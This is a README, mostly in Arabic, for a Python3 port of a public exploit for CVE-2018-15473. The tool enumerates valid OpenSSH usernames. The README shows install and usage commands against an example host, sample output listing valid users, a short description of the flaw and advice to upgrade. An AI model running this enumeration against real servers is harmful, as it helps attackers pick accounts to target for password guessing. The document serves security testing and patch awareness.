
استغلال قائم على Python لـ CVE-2018-15473 يمكن من تعداد أسماء مستخدمي OpenSSH عبر أوراكل استجابة المصادقة، مع أوضاع مستخدم واحد وقائمة كلمات.
استغلال تعداد اسم المستخدم عبر SSH (OpenSSH 2.3 < 7.7)
نسخة معدلة من الاستغلال الأصلي: https://www.exploit-db.com/exploits/45233
تم التحويل إلى Python3
تمت إضافة خيار قائمة كلمات المستخدم
#Install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./Exploit.py -h
يستجيب النظام بشكل مختلف لمحاولات المصادقة الصالحة وغير الصالحة. يمكن لمستخدم عن بُعد إرسال طلبات مصممة خصيصًا لتحديد أسماء المستخدمين الصالحة على النظام المستهدف. وبالتالي، يمكن لمستخدم عن بُعد تحديد أسماء المستخدمين الصالحة على النظام المستهدف.
يجب ترقية خادم OpenSSH إلى الإصدار 7.7 أو أعلى.